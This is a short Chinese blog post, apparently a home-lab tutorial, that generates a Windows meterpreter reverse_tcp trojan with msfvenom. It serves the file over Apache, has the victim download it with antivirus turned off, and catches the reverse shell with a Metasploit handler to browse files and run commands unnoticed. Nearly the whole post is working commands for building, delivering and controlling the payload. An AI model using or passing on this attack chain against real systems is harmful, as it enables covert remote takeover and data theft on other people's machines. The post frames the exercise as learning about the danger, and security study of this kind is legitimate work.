(NAT模式)在kali上先ifconfig得到kali的ip地址192.168.75.133
构建
`msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.75.133 lport=5000 -f exe -o /root/payload.exe
先转到/root
然后把这个文件放在apache的网站下
cd /root
`cp payload.exe /var/www/html
启动apache
systemctl start apache2
sysemctl status apache2
我这里用物理机win11登陆
在edge地址栏输入
kali的ip/payload.exe
会弹出一个框让你下载
(注意记得关杀毒软件)
接着在kali里输入
msfconsole
输入下面四条
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.75.133 # Kali 的 IP 地址
set lport 5000 # 监听的端口
exploit
会显示
然后再在物理机上运行刚刚下好的payload.exe
此时出现下图说明已经建立好链接
然后输入dir,就会出现物理机上的文件
输入shell和ipconfig
并且在kali上输入命令时,物理机不会有提示说正在被监听,正在被远程连接
因此这是很难注意到的危险
将生成的被控端放到网站上检测www.virustotal.com
被标记成木马文件了
标签:exe,kali,192.168,远程,利用,75.133,msfvenom,payload,输入 From: https://www.cnblogs.com/liufengwuya/p/18502911